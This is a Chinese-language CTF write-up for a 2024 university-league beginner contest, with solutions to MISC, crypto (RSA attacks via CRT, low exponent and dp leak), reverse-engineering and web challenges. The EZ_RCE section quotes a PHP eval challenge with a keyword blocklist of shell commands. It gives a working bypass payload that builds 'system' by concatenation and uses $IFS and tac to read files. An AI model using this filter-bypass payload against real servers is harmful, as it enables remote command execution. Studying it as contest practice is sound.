2024高校联盟CTF杯 WP

2024高校联盟CTF杯

官方wp

📎wp.pdf

总结

个人情况

img

img

赛题是真正的新生赛水平

Crypto还可以努努力

PWN是真的一点都不会

MISC

zip家族(solved)

📎zip.zip

img

img

解密base32

得到yunfanNSN为密码

img

得到第二个hint和zip密码为8位直接暴力破解

img

最后一个zip为伪加密,修复后解压得到flag

我上早八(solved)

📎zao8.zip

得到一张图片

在010中打开

为文件末隐藏数据

img

看不到我(solved)

📎aaa.zip

得到一个gif动图,可看到有字母

看不起

使用git逐帧分解

img

得到flag

我不是舔狗(solved)

下载的文件不可解压只需重命名为1.zip

📎tg.zip

得到一张图片,还有一个彩蛋

img

img

百度transcendence resort

青城山心越温泉度假酒店

Bot(solved)

📎robo.mp3

原题:

https://blog.csdn.net/LingDIHong/article/details/112616336

另类摩斯密码,b bo 类比10

1代表短 0代表长

1111 1 1011 1011 000 100 1111 10 0 11 111 0 1111 1 010 1 0100 11 0 11 111 0111 000 000 1001 0111 1 1 1001

HELLOWHATISTHEKEYITISBOOPBEEP

BOOPBEEP就是flag

CRYPTO

注意往下看(solved)

题目描述为:txt中密文对应的明文为一句有意义的话

内容

MMZFM3KZPFBHAT2YIJZUSSCRGJSFOZ3HMFKGY53CINBDKTRSNRYUSR3UOZHXSNDHMFKGY53CINBGUWTNMRUUSSDDPJRW2ULHMRKGQ5TBPFBHSTSYNRXA====

https://gchq.github.io/CyberChef/

img

解码得到一些单词,是要拼起来吗?

题目为向下看,四个字母包围一个字母,键盘包围解密

使用工具为

img

卡了好久还是不能太过于依赖工具

sefc -> D

i9pl -> O

t6uh -> Y

i9pl -> O

y7ij -> U

ko;. -> L

i9pl -> O

cfgb -> V

w3rd -> E

u8ok -> I

r5yg -> T

EasyMat(solved)

📎task3.py

中国剩余定理

丢给chatgpt3.5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from gmpy2 import *

# 已知的n_list和c_list
n_list = [
    81022657497308917969440684455145361573258269186878343256413341687865068279323,
    75913631015555672023140997922512551778987578704176071271327334667287271062597,
    94127642320478528456768535561236654642699719015872768666777965304146058015581,
    100067712121597104573152904878420393099718538392909527587227523052894062123273,
    85207018801137566782246500192695012724716098679652747885928950108181526448731,
    68062329770946647518875573914993880337430423210091356973352823810594223874279,
    97699132294281356807847058676444981641305119290874008718563253238741574493837,
    61964572830584557031631040358095731422357283653378273091543796652706730631753,
    105683433672193206747660489641266125023791083682987405305773324591115031496137,
    79409884513398319288102524631881088584154247050400489568179752853269260093899
]
c_list = [
    45265534758635258924325213125398605986800260408324458503575189195463010393615,
    12715074081092548766845794404913905983264472096042530328780531271103011520980,
    39140990597389311763264588051575388948778417314351644652781499410482069603306,
    76859345232346098524189772378621697847643153634405461255220957857908705865866,
    50422665384999138646319717291100929446583783934985038765690638359418199518261,
    448260554014950676172503176435439996507332612869507730554636929807845878262,
    11722992963028416365689373876553619277636897652000568840711756661567110676728,
    50228862527061065845819628079049107970736159720918650038834584407321617394070,
    77039544410906182205985046562127955618012574958894998445318963646090729861358,
    13230864747695729204181737413018408094825854953781811869710750475321879661987
]

# 计算N,即所有n的乘积
N = 1
for n in n_list:
    N *= n

# 使用中国剩余定理解密
M = 0
for n, c in zip(n_list, c_list):
    Ni = N // n
    yi = invert(Ni, n)
    M += c * yi * Ni

# M即为明文m的模N的值,将其转换为字节串
m = M % N
flag_bytes = m.to_bytes((m.bit_length() + 7) // 8, byteorder='big')

# 尝试解码得到flag
try:
    flag = flag_bytes.decode('utf-8')
    print("Decrypted flag:", flag)
except UnicodeDecodeError:
    print("Decrypted flag bytes:", flag_bytes)

小小的也很可爱(solved)

📎task2.py

低加密指数攻击

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from gmpy2 import *
from Crypto.Util.number import *
from sympy.external.gmpy import iroot

e = 3
c1 = 50693458449321936643002876350314571645483492898191488807231069919804643711069939947465500707751785291672584591666301916695212050174966310675882616625445835779080300345273253975477238447343967750619181738366040673523401544337748601129397554949157167078117809209674480735419596253142185617437157135028553535512
c2 = 68461554119116371147083386089552453735288867510520424213313079173741578139398748933397803590044864350237794073221482820153815072204593815103202302010872607529891174985131560381897122890186935183835887957097497249844470290572296180422540319205795848739267567991676339111284811461432510119947371569758485318185

n = 90544490827178754252962187794189026539597459100491154117742894089808204642960698141161214308791144141515252335630103490253410291789147112970571180845809176325505586392652118182228127519560532500789505277117619230772726766104579482737300391555520381632519494166348010918044038023332622630156514379058214998761
k = 0
while iroot(c1 + k * n, e)[1] == False:
    k += 1
m1 = iroot(c1 + k * n, e)[0]
while iroot(c2 + k * n, e)[1] == False:
        k += 1
m2 = iroot(c2 + k * n, e)[0]
print(long_to_bytes(m1) + long_to_bytes(m2))

叽里咕噜说啥呢(solved)

📎1.txt

维吉尼亚解密

https://www.guballa.de/vigenere-solver

Learning cryptography can help people understand and solve these information security problems, so as to better apply in modern information technology. Cryptography technology can meet the basic needs of information security, including identity, authentication, authorization, confidentiality, integrity and availability of information. The security of the system can be improved by the comprehensive application of symmetric cryptography, unidirectional hash function and asymmetric cryptography.

The Caesar cipher is the earliest substitution cipher, using a single column list. The basic idea is to encrypt and decrypt letters by moving a certain number of numbers. All letters in plaintext are moved backward (or forward) by a fixed number in the alphabet and replaced with ciphertext. oh, What is this.[118,136, 116, 134, 121, 143, 110, 133, 140, 56, 127, 137, 144, 138, 129, 62, 147, 136, 134, 66, 147, 133, 153, 154, 140, 154, 151, 167] I think we found a different Caesar code here.

exp:

1
2
3
4
5
6
7
8
9
10
11
12
s='gxctf'
l=[118,136, 116, 134, 121, 143, 110, 133, 140, 56, 127,137, 144, 138, 129, 62, 147, 136, 134, 66, 147, 133, 153,154, 140, 154, 151, 167]
# for i in range(len(s)):
#     diff=ord(s[i])-l[i]
#     print(diff)
diff=-15
flag=''
for i in range(len(l)):
    flag+=chr(l[i]+diff)
    diff-=1
print(flag)

EasyRSA(solved)

dp泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import gmpy2
from Crypto.Util.number import long_to_bytes, inverse

c = 44444088579666157621732553943670430273576254061474213939712213538406543268662965919310579281902129974974046495922523312658382899557387672355450391484977282423472695576509879204127236418710160228430907224557292043782574207980810012206965736060860845936702829630053500914689948188515065224954864332115028989648
n = 95383564587813903117264084370022798249408254695230018220531107804252937201014457059104201100944471086733795699882077502065034228927715000188417929139360620710897717662055202785483254232630518067785695466739940287445629280210950586820508333226251375040583347752697965543942500565891055165003961304756911395473
dp = 9124290354916175097961830868157352750253514515485171416231465524792780467304908803146834645823716115169328517501242615875895945850599189429277137939616265
e = 746129341247492452183022302843191577
a = 7

# 使用 gmpy2.gcd 计算 p
p = gmpy2.gcd(gmpy2.powmod(a, e * dp, n) - a, n)
q = n // p

# 使用 Crypto.Util.number.inverse 计算 d
d = inverse(e, (p - 1) * (q - 1))

# 解密密文
m = gmpy2.powmod(c, d, n)

# 将明文转换为字节
print(long_to_bytes(m))


RE

pycc签个到(solved)

📎pycc签个到.zip

得到.pyc文件,在如下网站进行反编译

https://tool.lu/pyc/

进行关注公众号得到四段flag拼在一起就好。

Just__upx+xor(solved)

📎Just__upxxor .zip

题目提到了 upx 和xor

得到exe使用upx脱壳

然后拖进ida反编译

img

密文为gm`fzVdmb1ld^u1^Fhojf1^bug|

img

  1. 长度检查:

  2. 第一个for循环检查由a1指向的内存区域的前27个字节。如果在这27个字节之前遇到了空字节('\0'),循环将提前终止。如果找到了空字节,但不在第27个字节处,函数将输出“Error length!”消息,暂停执行,并退出。

  3. 内容验证:

  4. 第二个for循环遍历相同的27个字节,并验证每个字节是否等于a2与由a3指向的相应字节进行按位异或(XOR)操作的结果。如果任何字节不匹配,函数将输出“Error flag!”消息,暂停执行,并退出。

1
2
3
4
5
6
7
known_str = "gm`fzVdmb1ld^u1^Fhojf1^bug|"
xor_value = 1
flag = ""
for char in known_str:
    flag += chr(ord(char) ^ xor_value)

print(flag)

f5又签到?(solved)

📎f5又签到.zip

正如题目描述

请用ida软件分析附件的二进制文件

在ida中打开

img

按F5得到flag

WEB

JS Challenge(solved)

白盒 代码审计

📎index.html

img

js代码被url加密了

解码url

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
function CaidaoCheck()

{

 var MyPass = document.getElementById('Incantation').value;

 if(""+parseInt(MyPass) == MyPass)

 {

 if(parseInt(MyPass)+7979886==10000000)

 {

 alert('复活成功!KEY就是复活咒语的32位md5值!');

 }else{

 alert('复活失败!请重新输入复活咒语');

 document.Get_Key.Incantation.value = '';

 }

 }else{

 alert('复活失败!请重新输入复活咒语');

 document.Get_Key.Incantation.value = '';

 }

}


关键:

if(parseInt(MyPass)+7979886==10000000)

{

alert('复活成功!KEY就是复活咒语的32位md5值!');

parseInt(MyPass)为2020114

flag为KEY的32位md5值

大圣在哪里(solved)

直接查看源代码

img

访问Wuuuuuukong.php

img

懂不懂什么叫传参啊(solved)

<?php``highlight_file('index.php');``include("flag.php");``$nsn = $_POST['nsn'];``$hbu = $_GET['hbu'];``if ``($nsn == "never say never" && $hbu == "never say no")`` {`` echo $flag;``}``?> get out!!

简单的get传参和post传参

img

黑手(solved)

F12看代码没有思路

直接开始扫目录

img

访问/robots.txt

img

访问php得到flag

EZ_RCE(solved)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php 

error_reporting(0); 

if (isset($_GET['cmd'])) { 
    $cmd = $_GET['cmd']; 

    if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) { 
       die("fk you hacker!"); 
    } else  { 
        eval($cmd); 
    } 
} else { 
    highlight_file(__FILE__); 
} 
?>

rce绕过

preg_match

正则过滤/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[|&><]|eval|system|exec|popen|shell_exec/i

system 空格 cat都被过滤掉

使用拼接来拼system

空格使用$IFS代替

cat使用tac

代替

https://www.freebuf.com/articles/web/261049.html

Playload:

1
http://218.31.44.233:16662/?cmd=$a='sy'.'stem';$a('pwd;cd$IFS/;tac%09f*;');